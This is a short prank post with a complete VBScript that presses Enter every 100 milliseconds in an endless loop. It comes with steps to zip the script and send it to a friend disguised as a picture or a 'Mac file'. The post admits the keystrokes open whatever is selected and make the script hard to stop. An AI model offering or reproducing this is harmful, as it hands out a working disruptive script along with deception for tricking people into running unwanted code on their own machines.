I have been getting some complaints about my last prank so I thought I do something a little more annoying and far more frustrating. This simple vbs script is going to piss any one off. What this script will do is repeatedly hit enter. Normally you can stop these scripts by ending the task, but the non stop pressing of enter will open anything that it selects. So how can you do this one?
Prank Attached: Enter.zip
Step1: Open note pad
Step 2: Copy this code
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Step 3: Save the file but be sure to end it with .vbs
Step 4: Zip it up and send it to your friend. Tell him/her that its a picture or something along those lines. If they ask why it looks weird, tel them its Mac file or Linux… They wont know the difference.
Once they have clicked on the file it will start running and if they are in arms reach you might want to start running too.

